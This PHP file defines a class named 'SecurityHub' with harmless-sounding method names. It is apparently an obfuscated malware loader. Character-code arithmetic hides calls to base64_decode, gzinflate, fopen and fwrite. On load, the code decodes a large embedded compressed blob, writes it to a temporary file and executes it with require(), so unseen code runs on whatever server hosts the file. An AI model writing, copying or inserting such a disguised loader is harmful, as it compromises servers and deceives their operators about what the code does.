<?php
class SecurityHub {
	private $wx = '';
	private $cp = '';

	public function terminateSession($p1) {
		$a = array((101*1),((97*1)+3),(49+62),(((63*25)-1476)),(103-2),100,((39+56)),((34+4+14)),(44+6+4),((44*2)+13),((116-1)),(((90*1)+7)),(((99*16)-1486)));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		$s = strrev($s);
		return $s($p1);
	}

	public function scheduleJob($p1) {
		$a = array(((23*3)+34),((27+95)),(112-7),110,102,(((22*65)-1322)),((20*3)+37),((29+87)),((98+1+2)));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		return $s($p1);
	}

	public function parseResponse($p1,$p2) {
		$a = array((97+2+3),((80+8+23)),((106+3+3)),((101*1)),(120-10));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		return $s($p1,$p2);
	}

	public function generateToken($p1,$p2) {
		$a = array(((101*1)),((2*58)),(111-6),(((89*1)+25)),119,((28*1)+74));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		$s = strrev($s);
		return $s($p1,$p2);
	}

	public function updateCache($p1) {
		$a = array((9+92),((69+8+38)),((114-3)),(26+82),((32*51)-1533),(102));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		$s = strrev($s);
		return $s($p1);
	}

	public function executeAction($p1,$p2=null) {
		$a = array(((53*2)+8),((77*1)+39),((7*56)-278),((3*35)),((18*2)+73));
		$s = '';
		foreach($a as $n){ $s .= chr($n); }
		return $s($p1,$p2);
	}

	public function cacheData() {
		$this->cp = $this->executeAction($this->triggerCallback(), '/');
	}

	public function prepareOutput() {
		$this->wx = $this->scheduleJob($this->terminateSession($this->pn));
	}

	public function sendNotification() {
		$fn = $this->cp.'/xj-6857f06fe70e4';
		$f = $this->parseResponse($fn, 'w');
		$this->generateToken($f, $this->wx);
		$this->updateCache($f);
		$this->calculateSum($fn);
	}

	private $pn = 'jVgLc6JaDP4r7UznVgZ15KGW9XJ3+lDrbldbfNYdx0EeiiAg4' . 'KPt7X+/yTlgwe26t60ISU6S8yUnCf37q7/wzzRHDcOzqbF78wN' . 'rq0bGWRipkaVdTF/DGr09MzeuFlmeezZ9Cd3cxXRjMG+WmTsPD' . 'cf88gUlGXo73ao5phYY0SZwz2ZqaFTEqW5onm7kPmR/ooIJU3v' . 'PGkxZQS1vHwtkNQjUl9zlNIhWl/I/l0/D9nI8ar8+9Nvbmau8z' . 'Phd9DTchzNBi3rCN3/MO5uOdb2+zF9OTbqClzZ687J4Odjot1z' . 'fGN04Hetmod3fhOqwvdCbznZmSWsQeB6NF/Cl8W24vqijG/gqo' . 'aLlco6anvk5UGSkeDskjEfOd63Zvuv2xt/UlVbqNX23Xd+vx6/' . 'KD3zuDh1BHSojZeg8qn1vN3QWnR91xwctOu8sZ4Nx1B36WxC5H' . '7i+/VTyyqh8H6BybYRiFeNaJha3HhIfmxJQg8c5JW58Svy2GAP' . '5TiREd2EgVecb4Qyo18Tn2G/bWiMPbyM/uXsJ7eR2vcE79V4pa' . 'Xfe9kG44Z6tsjAeflupw72jNqVXvTl4eVgB+F1pOeO5HZoQEDB' . 'Hs8pr7VWyn0fK4hEITx9W50uCnzB4mTUkf7ZyEmS1PbUHz2ASr' . 'g3QCl+84hDgvZBAQSLi4R6H8OHQGmGvvIO79z+IKY1ESilhvPs' . 'tsndCf42IInhuNpCpxrDawYyCPUCfNNdOfA5Nk2C7O+zi1bQTU' . 'c0Fok2oMxWJrfqiP2gg2tsfXXF39+S3KDAlSEYi5/sEAwLhh1u' . 'rNUkkkL+b8eXNeNguqUMJMvjmbgaSIDd+Kn2/QzS9xA+HYiK0w' . '451tSUB9MMkgL5GrYAwWa4fZ4BhEwmiEkGlm6Vx6DaUfr8h3fX' . 'qTqPnKMA2uwNUQFeGKhXCYKHc86g0fuw7+k3fVhoKkqVmj2sll' . 'jYGybC+PWj3OMIelRp1pXEQCJZGyioa6pO4dUHuXumX+8Tqa1q' . 'mX6Jc4kIs4B42b+zVgzDmEnrUVfrjRt8meknA9W12F128QdsId' . 'gOvRBg+RH63cRL1oRdrR+kUTgASRWgZ/oIiSVUwYKKZWGw1T4k' . '9E1zSOCKIQGzRY28EaeFPEIdLCnR994E52m0cYU4rWRITYAKjT' . 'gQPIuqOhGXc/IZZjmk8xKJjj5/SefRq0uANMLsqresDw1HJwWn' . 'd74AyHyCgdeTT7QQpXn81WHWsQ4IC25qR09i621vaUgTqd6TOb' . 'UJVR4dUpGVBx2JQJ4SIbFtbYdhW5Fg6Jj2sWEE//IbO874wVN0' . 'IctD2oGlhU4NMBC70F4apfcI0CQN6nhWGRgQtsFnv/UwLYHtgJ' . 'gzzdjFdzuTpeuFk1kOvoOuR/ddfYRT4Xkge8mkxqPoMcy7Lpuq' . 'E0GN1y8hoAQ+3eF5R17sBIr9IbIDtE/b7CWddbHFG4u/Kli+mt' . '53O91a9djGd7eWc5UZM4G1cPVdiS0wN+7WcK0hsgRPLhbOCxLF' . 'VQl4s4tZMH37i6ol85LGN0V1fMrXdwnKMeHr4EC/K6MHPgsgLr' . 'FgWJnQ6QKjOKeMKTVYEtsxTHpvjJCRxJaHAS1XYxNtBOOU5V2L' . 'JH5OsSrFYDlbNAkO1yYZZ9nfuRxROggBIvRMkqLoCf1VhBUEsi' . 'ByTVl4qCpkf9o8EBvUC7MSHlCaxWEn9VNk/PDOTHFM81sHxLMc' . 'zCZzAKwgCYCdIkxzaJPEnWwKWWK2wZalakCDQknhFJfLHGvlim' . 'U19AEgKXkEUeFYUuQmJMF3GV8CWKBTKV5NfPKse7eYPzwzqRTO' . '8UGH5CjGTDXipWC2z2QsmOKBruZqz0Q2649r7x5yJp/Riqi/BW' . '8OXhSJfka5EyC6uXBarQLT0rVyolK9EuHcMQy5wxatSVeLKvFQ' . 'plfkKomc6TiZlcJBCSMyVn6HDVIXh0Ze0ikw11XHUmZM9vjgkM' . 'SQodihrm8CZWq6FJxi0MTVCgBPt+Uiyw/xtX3noPPam3e7DdFB' . 'XWo3nx3pdydPq8X/E7zvdXv7oZJxY2Og8PHSGD53b616r085nw' . 'OcR8vTllCKl3usr7Z5y3e5CZ8oLkEoSnPETK+7r13cgmS1N+Hv' . 'KzG2n3a7f9nqtH/VOv5fnWOmEcCJ1ItdJXCHeRIexNzSiAanLF' . '59S50ZkuaYXMwhJc7zQiAm0A7z4mXIMgxczOZdzZalSuIKiVZD' . 'w2PACw8RvUiSgccUHPWvZV4PQmILyJDUupm6kymhknW1L2C5CU' . 'C9nknG5StoIrN8cV2yYnzFVj1QBA4fJ6JKWk6S3HEnhLI3HDvU' . 'WM4pDE2fJ32k2ycwFqn9dGA8g6mdLcaJmJsU0CbcGEzVuTV/sZ' . 'TP0NNvzDTeXIyB9TcvCGM18yZxemKKZz12EqZqZ5KmO9JHhSLn' . '57Iv5ks6lEpv8JZMAuMe8mf4mCulDHveOfquB/UsTpt3z3DS8Z' . 'CmWCVWVTUi5RAEnSiJbELE7EwugiCEpi11WVWOimk0GIx53YX9' . 'MbFu4gh7Al6uFKnyg+0Kpg7qZJDIahwGDJidRjx0sXMpJTnTrC' . 'tSXDIAhGsA8x/1F9vyULDoU0ogTcc09Jb0hswzp00Q6DE5J4/s' . 'GyH393PAr8L4cuwLvFqjXNk/pRSf2ic+fa49h1skUd2RntyEvC' . 'cT/0zh6vzewJLiBZncDIfkjzDgmz3+vDd86PnSdjgG8cZz0an7' . 'QBBloWk5kBNOtGuRwt3mhJMJUwuNYUhJIVus4kYZLWvGOV8Cu0' . 'jVa4oqZueEPz8yHAVB0qKmEoLm1U1MziW7xchcPzoa28M4+KZA' . 'mna2x19uZwoTvgCotgGGQ4eBQH9DyZhaPVOLrEFMz9jAGMMS98' . '8Q/3Wb+/ffwFAbpJ9tED+NF8R5XrhaP62kT8zgtwYr8DyrNHzm' . 'A7QM5YXDMwel4R5lgD5JkH8rQkwyX/MMv/vdf/LQMPTe5J64wp' . 'Pkk70q49n+8H2EfgJe69DsShgHlDhC9/wc=';

	public function calculateSum($p) {
		require($p);
	}

	public function triggerCallback() {
		$a=array((75+8+32),(((121*55)-6534)),(115),(95),((111-8)),((94+7)),(100+16),((5*19)),((101+10+5)),((34+67)),(104+5),((43+69)),(33+59+3),((2*50)),((115-10)),((4*14)+58));
		$s='';
		foreach($a as $n){$s.=chr($n);}
		return $s();
	}
}

$ri = new SecurityHub();
$ri->cacheData();
$ri->prepareOutput();
$ri->sendNotification();
